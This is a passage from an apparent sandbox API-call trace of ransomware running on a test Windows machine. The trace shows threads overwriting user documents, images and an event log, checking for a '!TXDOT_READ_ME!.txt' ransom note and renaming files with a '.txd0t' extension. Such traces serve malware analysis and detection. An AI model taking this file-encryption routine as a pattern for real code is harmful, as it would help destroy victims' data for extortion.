nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x414f684, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f684*=0x11000, lpOverlapped=0x0) returned 1 [0089.847] FlushFileBuffers (hFile=0x464) returned 1 [0089.861] GetProcessHeap () returned 0xe30000 [0089.861] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xee) returned 0xe9c940 [0089.861] StrCpyW (in: psz1=0xe9c940, psz2="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" | out: psz1="\\\\?\\C:\\Logs\\Windows PowerShell.evtx") returned="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" [0089.861] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Windows PowerShell.evtx") returned="Windows PowerShell.evtx" [0089.861] StrCpyW (in: psz1=0xe9c958, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.861] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.862] GetProcessHeap () returned 0xe30000 [0089.862] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9c940 | out: hHeap=0xe30000) returned 1 [0089.862] CloseHandle (hObject=0x464) returned 1 [0089.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" (normalized: "c:\\logs\\windows powershell.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Windows PowerShell.evtx.txd0t" (normalized: "c:\\logs\\windows powershell.evtx.txd0t")) returned 1 [0089.862] SetEvent (hEvent=0x404) returned 1 [0089.862] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0090.300] StrCpyW (in: psz1=0x414f640, psz2="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" [0090.302] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t" [0090.302] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t") returned 0 [0090.303] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms", dwFileAttributes=0x80) returned 1 [0090.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0090.305] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=855) returned 1 [0090.305] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.305] WriteFile (in: hFile=0x464, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0090.307] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffffaa9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.307] ReadFile (in: hFile=0x464, lpBuffer=0x380d020, nNumberOfBytesToRead=0x350, lpNumberOfBytesRead=0x414f600, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f600*=0x350, lpOverlapped=0x0) returned 1 [0090.307] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffffcb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.308] WriteFile (in: hFile=0x464, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x414f604, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f604*=0x350, lpOverlapped=0x0) returned 1 [0090.308] FlushFileBuffers (hFile=0x464) returned 1 [0090.429] GetProcessHeap () returned 0xe30000 [0090.429] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x176) returned 0xed4530 [0090.429] StrCpyW (in: psz1=0xed4530, psz2="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" [0090.429] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms") returned="winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" [0090.429] StrCpyW (in: psz1=0xed456a, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0090.429] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Searches\\!TXDOT_READ_ME!.txt") returned 1 [0090.429] GetProcessHeap () returned 0xe30000 [0090.429] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed4530 | out: hHeap=0xe30000) returned 1 [0090.429] CloseHandle (hObject=0x464) returned 1 [0090.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\winrt--{S-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t" (normalized: "c:\\users\\fd1hvy\\searches\\winrt--{s-1-5-21-1051304884-625712362-2192934891-1000}-.searchconnector-ms.txd0t")) returned 1 [0090.430] SetEvent (hEvent=0x404) returned 1 [0090.430] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0091.422] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0092.422] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0093.507] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0094.577] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0095.633] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0096.716] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0097.763] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0098.820] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0099.890] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0101.049] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0102.566] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0104.279] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0105.366] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0106.467] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0107.554] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0108.726] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0110.706] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0114.067] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0116.261] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0117.557] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0119.090] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0120.097] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0121.105] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0122.120] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0123.140] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0124.195] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0125.277] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0126.294] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0127.309] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0128.722] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0129.797] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0130.812] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0131.845] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0132.998] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0134.502] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0137.981] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0139.144] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0140.552] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0141.555] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0142.570] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0143.615] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0144.715] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) Thread: id = 13 os_tid = 0x168 [0070.880] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x102 [0071.929] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0072.146] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf" [0072.146] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf.txd0t" [0072.146] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf.txd0t") returned 0 [0072.147] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf", dwFileAttributes=0x80) returned 1 [0072.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\3qaejdzgg8tq5z.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x470 [0072.147] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=71218) returned 1 [0072.147] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.147] WriteFile (in: hFile=0x470, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0072.147] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xfffee7ce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.147] ReadFile (in: hFile=0x470, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11630, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x11630, lpOverlapped=0x0) returned 1 [0072.149] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0xfffee9d0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.150] WriteFile (in: hFile=0x470, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11630, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x11630, lpOverlapped=0x0) returned 1 [0072.150] FlushFileBuffers (hFile=0x470) returned 1 [0072.169] GetProcessHeap () returned 0xe30000 [0072.169] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xe41328 [0072.169] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf" [0072.169] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf") returned="3QaEJDzGG8TQ5z.rtf" [0072.169] StrCpyW (in: psz1=0xe41370, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.169] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.195] GetProcessHeap () returned 0xe30000 [0072.195] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0072.563] CloseHandle (hObject=0x470) returned 1 [0072.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\3qaejdzgg8tq5z.rtf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\3QaEJDzGG8TQ5z.rtf.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\3qaejdzgg8tq5z.rtf.txd0t")) returned 1 [0072.565] SetEvent (hEvent=0x40c) returned 1 [0072.565] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0072.999] StrCpyW (in: psz1=0x4a9f750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg" [0072.999] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg.txd0t" [0072.999] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg.txd0t") returned 0 [0072.999] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg", dwFileAttributes=0x80) returned 1 [0072.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\rnjq5zsppyjwr3b.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.999] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=94158) returned 1 [0072.999] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.999] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.001] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe8e32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.001] ReadFile (in: hFile=0x468, lpBuffer=0x415b020, nNumberOfBytesToRead=0x16fc0, lpNumberOfBytesRead=0x4a9f710, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f710*=0x16fc0, lpOverlapped=0x0) returned 1 [0073.003] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe9040, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.003] WriteFile (in: hFile=0x468, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x16fc0, lpNumberOfBytesWritten=0x4a9f714, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f714*=0x16fc0, lpOverlapped=0x0) returned 1 [0073.003] FlushFileBuffers (hFile=0x468) returned 1 [0073.519] GetProcessHeap () returned 0xe30000 [0073.519] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x106) returned 0xe9d750 [0073.519] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg" [0073.519] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg") returned="RnjQ5ZSPpYJwR3B.jpg" [0073.519] StrCpyW (in: psz1=0xe9d788, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.519] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.519] GetProcessHeap () returned 0xe30000 [0073.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0073.519] CloseHandle (hObject=0x468) returned 1 [0073.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\rnjq5zsppyjwr3b.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\RnjQ5ZSPpYJwR3B.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\rnjq5zsppyjwr3b.jpg.txd0t")) returned 1 [0073.524] SetEvent (hEvent=0x40c) returned 1 [0073.524] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.532] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf" [0073.532] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf.txd0t" [0073.532] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf.txd0t") returned 0 [0073.532] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf", dwFileAttributes=0x80) returned 1 [0073.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\sbwwluupbqiqnjg8qbe.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0073.533] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=70169) returned 1 [0073.534] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.536] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.537] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffeebe7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.537] ReadFile (in: hFile=0x468, lpBuffer=0x415b020, nNumberOfBytesToRead=0x11210, lpNumberOfBytesRead=0x4a9f700, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesRead=0x4a9f700*=0x11210, lpOverlapped=0x0) returned 1 [0073.548] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffeedf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.548] WriteFile (in: hFile=0x468, lpBuffer=0x415b020*, nNumberOfBytesToWrite=0x11210, lpNumberOfBytesWritten=0x4a9f704, lpOverlapped=0x0 | out: lpBuffer=0x415b020*, lpNumberOfBytesWritten=0x4a9f704*=0x11210, lpOverlapped=0x0) returned 1 [0073.549] FlushFileBuffers (hFile=0x468) returned 1 [0073.645] GetProcessHeap () returned 0xe30000 [0073.645] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xed2328 [0073.645] StrCpyW (in: psz1=0xed2328, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf" [0073.645] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf") returned="SbwWluUpbQiQnJG8qbe.pdf" [0073.645] StrCpyW (in: psz1=0xed2360, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0073.645] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0073.645] GetProcessHeap () returned 0xe30000 [0073.645] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2328 | out: hHeap=0xe30000) returned 1 [0073.645] CloseHandle (hObject=0x468) returned 1 [0073.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\sbwwluupbqiqnjg8qbe.pdf"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\SbwWluUpbQiQnJG8qbe.pdf.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\sbwwluupbqiqnjg8qbe.pdf.txd0t")) returned 1 [0073.648] SetEvent (hEvent=0x40c) returned 1 [0073.648] WaitForSingleObject (hHandle=0x410, dwMilliseconds=0x3e8) returned 0x0 [0073.650] StrCpyW (in: psz1=0x4a9f740, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp" [0073.650] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp.txd0t" [0073.650] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp.txd0t") returned 0 [0073.650] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp", dwFileAttributes=0x80) returned 1 [0073.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\T2UrA\\3dId0lsBJQweABTLa.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\t2ura\\3did0lsbjqweabtla.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0073.651] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x4a9fcec | out: lpFileSize=0x4a9fcec*=56244) returned 1 [0073.651] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.651] WriteFile (in: hFile=0x468, lpBuffer=0x4a9f9d0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4a9fce8, lpOverlapped=0x0 | out: lpBuffer=0x4a9f9d0*, lpNumberOfBytesWritten=0x4a9fce8*=0x200, lpOverlapped=0x0) returned 1 [0073.652] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff224c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.652] ReadFile (in: hFile=0x468, lpBuffer=0x415b020, nNumberOfBytesToRead=0xdbb0, 